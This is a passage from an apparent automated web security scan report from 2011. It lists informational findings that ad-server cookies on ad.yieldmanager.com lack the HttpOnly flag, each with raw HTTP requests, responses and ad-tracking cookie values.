Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:44:58 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.21. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgCC9HQfquCkAOlZMpL9Io9i3zLSbCa8ZfwmnlAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rca20kb%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3DzV2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D59509023%26cb%3D1315313081109312%26i%3D140509%26r%3D0,0254ac84-d886-11e0-b5f4-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rca20kb/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=zV2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$
=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0406.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8^!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8^~~"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: uid=uid=04358f32-d886-11e0-934b-87a5113d12ef&_hmacv=1&_salt=1445808906&_keyid=k1&_hmac=71f80210cf05029c6f70f1dbcbfe9d80aca9ddb3; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1432
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="tu
...[SNIP]...

10.22. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G
@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="ht
...[SNIP]...

10.23. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15j13o5q5/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=0F2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$
=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!